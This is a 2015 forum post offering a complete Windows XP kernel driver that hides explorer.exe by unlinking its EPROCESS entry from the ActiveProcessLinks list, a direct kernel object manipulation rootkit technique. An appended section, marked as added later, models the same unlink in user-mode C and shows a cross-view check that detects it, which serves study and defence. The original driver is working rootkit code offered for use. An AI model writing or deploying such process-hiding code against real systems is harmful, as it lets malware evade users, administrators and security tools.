
- Hiding a Process in Ring0 with DKOM

Discussion in 'C++' started by HerO0z, Jan 16, 2015.

  1. HerO0z

    HerO0z New member


    #coded by Xash
    #snippet only

    This snippet hides a process (here explorer.exe) on WinXP through direct manipulation of kernel objects, DKOM (Direct Kernel Object Manipulation).

    Code :
    // The hard-coded offsets (ImageFileName at +0x174, ActiveProcessLinks at +0x088)
    // are the Windows XP EPROCESS layout this snippet targets.
    #include <ntddk.h>
    #include <string.h>

    typedef unsigned long DWORD;
    typedef DWORD* PDWORD;

    VOID unload(PDRIVER_OBJECT pDriverObject) {
        DbgPrint("[-] Oh no :'(\n");
    }

    NTSTATUS DriverEntry(PDRIVER_OBJECT pDriverObject, PUNICODE_STRING pRegistryPath) {
        PEPROCESS currentProcess;
        PEPROCESS nextProcess;
        PLIST_ENTRY listProcess;

        pDriverObject->DriverUnload = unload;
        DbgPrint("[+] The devil is in your kernel!\n");

        // Walk the circular ActiveProcessLinks list starting from our own process.
        currentProcess = IoGetCurrentProcess();
        nextProcess = currentProcess;

        do {
            DbgPrint("- %s\n", (PUCHAR)((PUCHAR)nextProcess + 0x174)); // +0x174 ImageFileName : [16] UChar
            listProcess = (PLIST_ENTRY)((PUCHAR)nextProcess + 0x88);   // +0x088 ActiveProcessLinks : _LIST_ENTRY

            if (strcmp((const char *)((PUCHAR)nextProcess + 0x174), "explorer.exe") == 0) {
                // +0x000 Flink
                // +0x004 Blink
                // => Flink + 1 = Blink of the next member
                *((PDWORD) listProcess->Flink + 1) = (DWORD) listProcess->Blink;
                *((PDWORD) listProcess->Blink) = (DWORD) listProcess->Flink; // Blink = Flink of the previous member

                DbgPrint("explorer.exe is now like a ninja\n");
            }

            nextProcess = (PEPROCESS) listProcess->Flink;
            // Flink points at the next process's ActiveProcessLinks field; subtract
            // its offset to get back to the start of that EPROCESS.
            nextProcess = (PEPROCESS)((PUCHAR)nextProcess - 0x88);
        } while (nextProcess != currentProcess);

        return STATUS_SUCCESS;
    }
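An added example, not part of the original post or of Xash's snippet: a user-mode C model of the ActiveProcessLinks unlink above, paired with the cross-view check a defender uses to catch it. The toy process table, the PIDs and the image names are constructed here, and the struct layout is a stand-in rather than the real EPROCESS. What it shows is that unlinking only hides the process from code that walks the list; the object itself still exists, and comparing the list walk against an independent view of all process objects (in a real kernel, the PID handle table or a pool scan, which is what comparing Volatility's pslist and psscan output relies on) exposes the hidden entry.

```c
/* Added example: toy model of a DKOM list unlink and cross-view detection.
 * Everything here (struct layout, table, names, PIDs) is constructed for the
 * demonstration; it is not the Windows kernel layout. */
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Stand-in for the kernel's doubly linked LIST_ENTRY. */
typedef struct list_entry {
    struct list_entry *flink;
    struct list_entry *blink;
} list_entry_t;

/* Stand-in for EPROCESS: only the fields the technique touches. */
typedef struct toy_process {
    unsigned pid;
    char image_file_name[16];
    list_entry_t active_process_links;
    int alive;                      /* object still exists and is scheduled */
} toy_process_t;

#define MAX_PROCS 8

/* View 2: every process object that exists, independent of the linked list.
 * In a real kernel this role is played by the PID table or a pool scan. */
static toy_process_t g_table[MAX_PROCS];
static int g_count;
static list_entry_t g_list_head;    /* View 1: head of the circular list */
static const char *g_hidden[MAX_PROCS];

/* CONTAINING_RECORD equivalent: recover the process from its embedded entry,
 * the same "subtract the field offset" step the snippet does with 0x88. */
static toy_process_t *from_entry(list_entry_t *e) {
    return (toy_process_t *)((char *)e - offsetof(toy_process_t, active_process_links));
}

static void reset_system(void) {
    memset(g_table, 0, sizeof g_table);
    g_count = 0;
    g_list_head.flink = &g_list_head;
    g_list_head.blink = &g_list_head;
}

/* Create a process object and append it to the tail of the list. */
static toy_process_t *create_process(unsigned pid, const char *name) {
    if (g_count >= MAX_PROCS) return NULL;
    toy_process_t *p = &g_table[g_count++];
    list_entry_t *e = &p->active_process_links;
    p->pid = pid;
    strncpy(p->image_file_name, name, sizeof p->image_file_name - 1);
    p->alive = 1;
    e->flink = &g_list_head;
    e->blink = g_list_head.blink;
    g_list_head.blink->flink = e;
    g_list_head.blink = e;
    return p;
}

/* The two pointer writes from the post: the neighbours skip the entry.
 * The object is left alive and its own pointers untouched, as in the snippet. */
static int dkom_unlink(const char *name) {
    list_entry_t *e;
    for (e = g_list_head.flink; e != &g_list_head; e = e->flink) {
        if (strcmp(from_entry(e)->image_file_name, name) == 0) {
            e->flink->blink = e->blink;   /* "Flink + 1 = Blink" in the post */
            e->blink->flink = e->flink;   /* "*Blink = Flink" in the post */
            return 1;
        }
    }
    return 0;
}

/* View 1: what a naive process lister that walks the list sees. */
static int count_listed(void) {
    int n = 0;
    list_entry_t *e;
    for (e = g_list_head.flink; e != &g_list_head; e = e->flink) n++;
    return n;
}

static int is_listed(const toy_process_t *p) {
    const list_entry_t *e;
    for (e = g_list_head.flink; e != &g_list_head; e = e->flink)
        if (e == &p->active_process_links) return 1;
    return 0;
}

/* Cross-view check: live objects in the table that the list walk cannot reach. */
static int find_hidden(void) {
    int i, n = 0;
    for (i = 0; i < g_count; i++)
        if (g_table[i].alive && !is_listed(&g_table[i]))
            g_hidden[n++] = g_table[i].image_file_name;
    return n;
}

static const char *hidden_name(int i) { return g_hidden[i]; }

int main(void) {
    int n, i;
    reset_system();
    create_process(4, "System");          /* constructed sample processes */
    create_process(1234, "explorer.exe");
    create_process(2222, "notepad.exe");
    printf("listed before unlink: %d\n", count_listed());
    dkom_unlink("explorer.exe");
    printf("listed after unlink:  %d\n", count_listed());
    n = find_hidden();
    for (i = 0; i < n; i++) printf("hidden by cross-view: %s\n", hidden_name(i));
    return 0;
}
```

It builds with any C compiler and needs no Windows headers. The detection side is the part worth keeping in mind: a list-based `tasklist`-style view drops to two entries after the unlink, while the table still holds three live objects, so the discrepancy is the signal.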